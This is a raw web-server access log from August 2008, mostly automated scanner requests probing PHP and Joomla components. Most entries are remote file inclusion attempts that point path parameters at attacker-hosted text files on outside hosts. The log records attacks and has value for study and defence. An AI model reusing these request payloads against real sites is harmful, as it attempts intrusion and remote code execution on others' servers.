74.6.18.244 - - [03/Aug/2008:17:01:58 -0700] "GET /logs/?M=A HTTP/1.0" 200 1780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
92.56.99.197 - - [03/Aug/2008:17:03:28 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
92.56.99.197 - - [03/Aug/2008:17:03:28 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
92.56.99.197 - - [03/Aug/2008:17:03:28 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
125.175.78.175 - - [03/Aug/2008:17:04:02 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.aliirwin.com"
125.175.78.175 - - [03/Aug/2008:17:04:02 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.aliirwin.com"
218.219.147.58 - - [03/Aug/2008:17:04:11 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.aliirwin.com"
218.219.147.58 - - [03/Aug/2008:17:04:11 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.aliirwin.com"
65.111.37.210 - - [03/Aug/2008:17:05:17 -0700] "GET //?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:05:59 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
67.19.204.226 - - [03/Aug/2008:17:07:17 -0700] "GET /components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
67.19.204.226 - - [03/Aug/2008:17:07:17 -0700] "GET /logs/access.log/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
67.19.204.226 - - [03/Aug/2008:17:07:17 -0700] "GET /logs/components/com_rsgallery/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:07:52 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:07:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:07:53 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:08:07 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:08:07 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:08:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
62.231.161.4 - - [03/Aug/2008:17:10:43 -0700] "GET /logs/access.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
62.231.161.4 - - [03/Aug/2008:17:10:43 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
62.231.161.4 - - [03/Aug/2008:17:10:44 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:10:49 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:10:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:10:49 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
221.144.12.141 - - [03/Aug/2008:17:11:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
72.232.178.178 - - [03/Aug/2008:17:12:27 -0700] "GET /logs/access_080526.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
65.111.37.210 - - [03/Aug/2008:17:13:30 -0700] "GET /logs/access.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
65.111.37.210 - - [03/Aug/2008:17:13:30 -0700] "GET /logs//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 1944 "-" "libwww-perl/5.805" "www.aliirwin.com"
67.18.29.218 - - [03/Aug/2008:17:13:43 -0700] "GET /logs/access.log//components/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
67.18.29.218 - - [03/Aug/2008:17:13:43 -0700] "GET //components/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
67.18.29.218 - - [03/Aug/2008:17:13:43 -0700] "GET /logs//components/errors.php?error=http://www.richandrowdyretirement.com/rss.php/index.php/echo???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
64.91.231.131 - - [03/Aug/2008:17:18:41 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
89.108.64.208 - - [03/Aug/2008:17:18:52 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
89.108.64.208 - - [03/Aug/2008:17:18:53 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
89.108.64.208 - - [03/Aug/2008:17:18:53 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:21:38 -0700] "GET /logs/access_080609.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
217.20.116.93 - - [03/Aug/2008:17:21:38 -0700] "GET /logs/access_080609.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.aliirwin.com"
125.24.4.226 - - [03/Aug/2008:17:26:07 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
125.24.4.226 - - [03/Aug/2008:17:26:08 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
125.24.4.226 - - [03/Aug/2008:17:26:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
125.24.4.226 - - [03/Aug/2008:17:28:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
65.111.37.210 - - [03/Aug/2008:17:34:31 -0700] "GET /logs/access_080519.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
67.15.8.80 - - [03/Aug/2008:17:36:07 -0700] "GET /logs/access_080526.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.aliirwin.com"
67.15.8.80 - - [03/Aug/2008:17:36:10 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.aliirwin.com"
67.15.8.80 - - [03/Aug/2008:17:36:19 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:41:35 -0700] "GET /logs/access_080602.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
221.144.12.141 - - [03/Aug/2008:17:41:36 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
221.144.12.141 - - [03/Aug/2008:17:41:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
221.144.12.141 - - [03/Aug/2008:17:41:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
216.246.78.8 - - [03/Aug/2008:17:47:51 -0700] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
216.246.78.8 - - [03/Aug/2008:17:47:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
76.74.137.190 - - [03/Aug/2008:17:55:42 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.aliirwin.com"
76.74.137.190 - - [03/Aug/2008:17:55:43 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:15 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:15 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:15 -0700] "GET ///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:15 -0700] "GET ///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:16 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
200.126.108.198 - - [03/Aug/2008:17:58:16 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:17:58:25 -0700] "GET /logs/access_080225.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:58:30 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:58:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:58:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
67.15.8.80 - - [03/Aug/2008:17:59:00 -0700] "GET /logs/access_080526.log%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:59:27 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:59:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
85.214.59.54 - - [03/Aug/2008:17:59:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.200.78.44 - - [03/Aug/2008:17:59:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
216.139.67.20 - - [03/Aug/2008:18:00:39 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.aliirwin.com"
216.139.67.20 - - [03/Aug/2008:18:00:39 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.aliirwin.com"
218.219.147.58 - - [03/Aug/2008:18:01:18 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.aliirwin.com"
218.219.147.58 - - [03/Aug/2008:18:01:20 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.aliirwin.com"
221.144.12.141 - - [03/Aug/2008:18:01:45 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
125.175.78.175 - - [03/Aug/2008:18:02:19 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.aliirwin.com"
125.175.78.175 - - [03/Aug/2008:18:02:19 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.aliirwin.com"
193.178.118.47 - - [03/Aug/2008:18:02:22 -0700] "GET ///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
193.178.118.47 - - [03/Aug/2008:18:02:25 -0700] "GET /logs///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
193.178.118.47 - - [03/Aug/2008:18:02:28 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
59.126.46.141 - - [03/Aug/2008:18:03:07 -0700] "GET /logs/scripts.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
59.126.46.141 - - [03/Aug/2008:18:03:09 -0700] "GET /main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
59.126.46.141 - - [03/Aug/2008:18:03:11 -0700] "GET /logs/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
190.54.62.66 - - [03/Aug/2008:18:04:39 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.aliirwin.com"
190.54.62.66 - - [03/Aug/2008:18:04:39 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.aliirwin.com"
85.214.41.164 - - [03/Aug/2008:18:04:44 -0700] "GET /logs//errors.php?error=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.aliirwin.com"
85.214.41.164 - - [03/Aug/2008:18:04:44 -0700] "GET //errors.php?error=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.aliirwin.com"
218.188.33.2 - - [03/Aug/2008:18:10:46 -0700] "GET /logs/access.log//vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
218.188.33.2 - - [03/Aug/2008:18:10:46 -0700] "GET /logs//vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
218.188.33.2 - - [03/Aug/2008:18:10:46 -0700] "GET //vwar/backup/errors.php?error=http://www.hydrocomp.com/phpmyfaq/attachments/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
67.195.37.114 - - [03/Aug/2008:18:12:50 -0700] "GET /logs/access.log HTTP/1.0" 200 20826 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.aliirwin.com"
67.15.186.5 - - [03/Aug/2008:18:17:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.aliirwin.com"
67.15.186.5 - - [03/Aug/2008:18:17:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.aliirwin.com"
59.126.46.141 - - [03/Aug/2008:18:19:29 -0700] "GET /logs/access_080519.log/main.php3?act=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
82.146.39.200 - - [03/Aug/2008:18:25:58 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.93.200.219 - - [03/Aug/2008:18:26:24 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:30:04 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:30:53 -0700] "GET /logs/access.log/images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:30:53 -0700] "GET /logs/images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:30:53 -0700] "GET /images/errors.php?error=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.aliirwin.com"
119.63.194.37 - - [03/Aug/2008:18:33:01 -0700] "GET / HTTP/1.1" 200 779 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:34:44 -0700] "GET /images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:34:44 -0700] "GET /logs/images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:18:36:07 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:37:28 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.240.146 - - [03/Aug/2008:18:38:07 -0700] "GET /images/errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:18:38:16 -0700] "GET /logs/access_080804.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
194.79.75.195 - - [03/Aug/2008:18:40:34 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.aliirwin.com"
194.79.75.195 - - [03/Aug/2008:18:40:34 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.aliirwin.com"
